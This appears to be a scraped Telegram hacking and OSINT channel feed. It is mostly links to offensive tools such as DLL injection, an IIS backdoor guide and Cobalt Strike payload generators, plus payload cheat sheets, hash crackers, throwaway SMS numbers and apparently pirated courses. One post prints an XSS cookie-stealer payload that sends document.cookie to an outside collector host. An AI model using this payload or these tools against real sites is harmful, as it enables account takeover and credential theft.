1728
ᴍᴏʀᴇ ʏᴏᴜ sᴇᴀʀᴄʜ ᴍᴏʀᴇ ʏᴏᴜ ᴋɴᴏᴡ instagram.com/technical_devang Founder 🌐 protoncybersec.in ¯\_(ツ)_/¯ @Technicaldevang_bot
MEMERY
Very easy to install and use #python tool (with GUI) for text search of images in a local directory on your computer or server.
https://github.com/deepfates/memery
superbolt.web.app
A new tool from GrayLark allows to geolocate a photo by very small details (a window corner, a trash can, a bush on the sidewalk, etc.).
So far only works for San Francisco, but many other cities are ahead.
From HTTP to RCE - How to leave backdoor in IIS.
https://cicada-8.medium.com/from-http-to-rce-how-to-leave-backdoor-in-iis-cbef8249eba9
https://www.udemy.com/course/pentesting-the-ultimate-guide/?couponCode=52688EA01C3C3E9E0C0D
Читать полностью…
FaceDancer: An exploitation tool aimed at creating hijackable, proxy-based DLLs.
https://meterpreter.org/facedancer-an-exploitation-tool-aimed-at-creating-hijackable-proxy-based-dlls/
Phone Number For SMS Verify Anything - 2024
FREE SMS VERIFICATION WEBSITES
➤ Temporary Phone Number: https://temporary-phone-number.com/
➤ Receive SMS: https://receive-smss.com/
➤ Unlimited Free SMS: https://freeioSMS.com/
➤ Anonym SMS: https://anonymsms.com/
➤ See SMS: https://www.smsver.com
➤ Groovl: https://www.groovl.com
➤ Text anywhere: http://www.textanywhere.net
➤ Receive SMS online.ME: http://receivesmsonline.me
➤ Free Receive SMS online: http://freereceivesmsonline.com
➤ SMS Listen: https://smslisten.com
➤ SMS Receive free: https://smsreceivefree.com
➤ Online SMS: https://sms-online.co
➤ Receive SMS online: https://smsreceiveonline.com
➤ Receive SMS Online.NET: https://www.receivesmsonline.net
➤ Free SMS checks: www.freesmsverifications.com
➤ 7 SIM.NET: http://7sim.net
➤ HS3X: http://hs3x.com
➤ Receive free SMS: http://receivefreesms.com
➤ Get a free SMS number: https://getfreesmsnumber.com
➤ Receive SMS: http://sms-receive.net
➤ Receive free SMS.NET: http://receivefreesms.net
➤ Receive SMS Online.IN: http://receivesmsonline.in
➤ Receive SMS online: https://receive-sms-online.com
➤ Free virtual SMS number: https://freevirtualsmsnumber.com
➤ SMS Tibo: https://smstibo.com
➤ Receive SMS number: https://receivesmsnumber.com
➤ Receive SMS co: https://receivesms.co/
➤ Free SMS code: https://freesmscode.com
➤ Online SMS numbers: https://smsnumbersonline.com
➤ SMS reception: https://smsreceiving.com
➤ SMS.SELLAITE: http://sms.sellaite.com
➤ Send SMS now: http://www.sendsmsnow.com
➤ Receive SMS online.EU: http://receivesmsonline.eu
➤ Proovl: https://www.proovl.com/numbers
➤ Anon SMS: https://anon-sms.com
➤ Hide my numbers: http://hidemynumbers.com
➤ Pinger: https://www.pinger.com
➤ Free online phone: https://www.freeonlinephone.org
➤ Capture SMS: https://catchsms.com
➤ SMS Get: http://smsget.net
➤ 1S2U: https://1s2u.com
➤ Receive SMS: http://getsms.org
➤ Vritty: https://virtty.com
➤ Indian SMS Web: https://indianSMSweb.in
Advanced SQL Injection Techniques by nav1n0x
https://nav1n0x.gitbook.io/advanced-sql-injection-techniques
Stowaway: A Multi-hop proxy tool for security researchers and pentesters
Users can use this program to proxy external traffic through multiple nodes to the core internal network, breaking through internal network access restrictions, constructing a tree-like node network, and easily realizing management functions.
https://github.com/ph4ntonn/Stowaway/
YOUTUBE (OSINT)
Invidious Instances https://docs.invidious.io/instances/
YouTube video upload time https://www.aware-online.com/en/osint-tutorials/youtube-video-upload-time/
yt-dlp https://pypi.org/project/yt-dlp/
youtube-dl https://ytdl.actionsack.com/
Location Search https://mattw.io/youtube-geofind/location
YouTube Metadata Bulk https://mattw.io/youtube-metadata/bulk
Hadzy.com https://hadzy.com/
Youtube channel ID https://commentpicker.com/youtube-channel-id.php
Extract Meta Data YouTube https://citizenevidence.amnestyusa.org/
Youtube Geo Search Tool https://youtube.github.io/geo-search-tool/search.html
Youtube Channel Search https://asif633.github.io/youtube-channel-search/
YouTube search tool https://www.aware-online.com/en/osint-tools/youtube-search-tool/
Yout https://yout.com/
YouTube Comment Finder https://ytcomment.kmcat.uk/
Youtube, Periscope, Twitch & Dailymotion https://one-plus.github.io/Youtube
Unlistedvideos.com https://unlistedvideos.com/
Youtube Comments Downloader https://youtubecommentsdownloader.com/
CrossC2
Generate CobaltStrike's cross-platform payload:
• Windows
• Android
• iOS
• Linux
• MacOS
• Embedded
https://gloxec.github.io/CrossC2/en/
Ethical Hacking Masterclass
Link: https://drive.google.com/drive/folders/1mZwaNmPJB6OcGf-lSejIvbU8y2YxjDt4
WHAT IF SOMEONE CREATE NUDES OF YOUR PHOTOS?
If your photo has been manipulated using AI or Photoshop to create nude and other explicit content, you can visit https://www.stopncii.org/ to report the incident.
By submitting the original and edited photos, they will ensure the edited version is removed from all online platforms.
50 penetration testing tools
1. Nmap 🌐
2. Metasploit 🛠
3. Burp Suite 🐛
4. Wireshark 🖥
5. OWASP ZAP (Zed Attack Proxy) 🛡
6. Nikto 🕵️♂️
7. SQLMap 🗺
8. Acunetix 🕷
9. Nessus 🚀
10. OpenVAS 🚪
11. BeEF (Browser Exploitation Framework) 🐄
12. Shodan 🔍
13. Wfuzz 🌀
14. DirBuster 🚪
15. XSStrike 💥
16. Sublist3r 🎯
17. Hydra 🐍
18. Skipfish 🐟
19. Recon-ng 🕵️♂️
20. Masscan 🛰
21. Gitrob 🕵️♂️
22. Gobuster 🔦
23. Joomscan 🕵️♂️
24. WPScan 🔍
25. EyeWitness 👀
26. Fiddler 🎻
27. sqlninja 🥷
28. Vega 🌟
29. Arachni 🕷
30. DirSearch 🔍
31. httrack 🏃♂️
32. CMSmap 🗺
33. DVWA (Damn Vulnerable Web Application) 😈
34. Docker Bench for Security 🐋
35. Amass 📈
36. Zed Attack Proxy 🛡
37. SonarQube 🛡
38. ClamAV 🦪
39. OSSEC 🔐
40. Tripwire 🛡
41. AIDE (Advanced Intrusion Detection Environment) 🛡
42. Fail2Ban 🚫
43. Lynis 🐧
44. Snort 🐽
45. Suricata 🦈
46. Security Onion 🧅
47. Maltego 🔄
48. Cobalt Strike 🌩
49. BloodHound 🩸
50. Empire 🏰
Online Hash Crackers
cloudcracker.net
crypo.com/
xmd5.org/index_en.htm
cmd5.org
crackstation.net
tydal.nu/article/md5-crack/
md5.darkbyte.ru/
md5.rednoize.com
md5.web-max.ca/
md5crack.com
md5decryption.com
md5online.org
onlinehashcrack.com
passcracking.com
cybermonks.t.me
freerainbowtables.com/de/hashcracking/
functions-online.com/md5.html
hash-cracker.com/
hashemall.com/
hashgenerator.de
insidepro.com/hashes.php?lang=rus
md5.cz/
miraclesalad.com/webtools/md5.php
tydal.nu/article/md5-crack
whatsmyip.org/hash-generator/
xorbin.com/tools/md5-hash-calculator
https://github.com/AleksaMCode/WiFi-password-stealer:
Читать полностью…
Finding Email Addresses without Paywalls
Every Pentester or Red Teamer has likely encountered situations where they need to perform User Enumeration or Password Spraying, but where can you find a list of valid users? Snov.io, Hunter.io, and Phonebook.cz no longer provide easy access to email lists and instead hit you with a paywall.
Here’s the solution — Prospeo! Just log in with Google SSO, enter the target domain, and get a list of email addresses with no strings attached.
Telegram Scraper
- scrape messages from multiple channels
- download media files
- export data to JSON/CSV formats
- SQLite database storage
https://github.com/unnohwn/telegram-scraper
Obsidian Web Clipper
New extension that helps you highlight and capture the web in your browser. Anything you save is stored as durable Markdown files that you can read offline, and preserve for the long term.
Source:
https://obsidian.md/clipper
DNS History | Largest Archive Of DNS Records & Domain History
https://completedns.com/dns-history/
▪️15 Best Information gathering tools
• Network Map
•Dracnmap
•Xerosploit
•RED HAWK (All In One Scanning)
•Recon Spider (For All Scaning)
•IsItDown (Check Website Down/Up)
•ReconDog
•Striker
•SecretFinder (like API & etc)
•Find Info Using Shodan
•Port Scanner - rang3r
•Breacher
https://www.vulnerability-lab.com/list-of-bug-bounty-programs.php
Читать полностью…
Access onion sites online without Tor browser:
https://tor2web.activetk.jp/
Free Threat Intelligence Tools by Hudson Rock
- Search for Compromised Corporate & Supply Chain Infrastructure
- Search for Compromised Employees, Customers, Users & Partners
- Discover the Password Hygiene Used by Any Company
- Use the Technology Profiler to Discover which Companies are Using a Technology
- Search for Compromised Android App Users
🔗 https://www.hudsonrock.com/threat-intelligence-cybercrime-tools
Bug bounty Cheatsheet:
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
SSRF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
CRLF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
CSV-Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection
Command Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Directory Traversal
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
LFI
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
XXE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md
Open-Redirect
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md
RCE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md
Crypto
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md
Template Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
XSLT
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md
Content Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md
LDAP Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection
NoSQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
CSRF Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection
GraphQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection
IDOR
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References
ISCM
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management
LaTex Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
OAuth
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth
XPATH Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
Bypass Upload Tricky
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
Facebook Page Monetization - Complete Course
https://drive.google.com/file/d/1CgqVX05sUh-Ubra4sAJnHwSxIQ4axZIc/view?usp=sharing
XSS to account takeover with cookie 🍪 stealer script.
')"<svg onload="const cred=document.cookie;console.log(new Image().src= http://burpcolab?cookie= +cred)";>
IconJector: Unorthodox and stealthy way to inject a DLL into the explorer using icons.
https://github.com/0xda568/IconJector
Ec-Council | Drone Hacking Workshop
Download : https://teraboxapp.com/s/1GV6U9bknGFhxGF5s2wGD9Q
Telegram OSINT
https://github.com/cqcore/Telegram-OSINT
Telegram bots for information gathering
Browser extensions
Tools
Channels directories
Educational articles and videos
Custom search engines
Google Dorks
OSINT Surveillance.
https://github.com/CScorza/OSINTSurveillance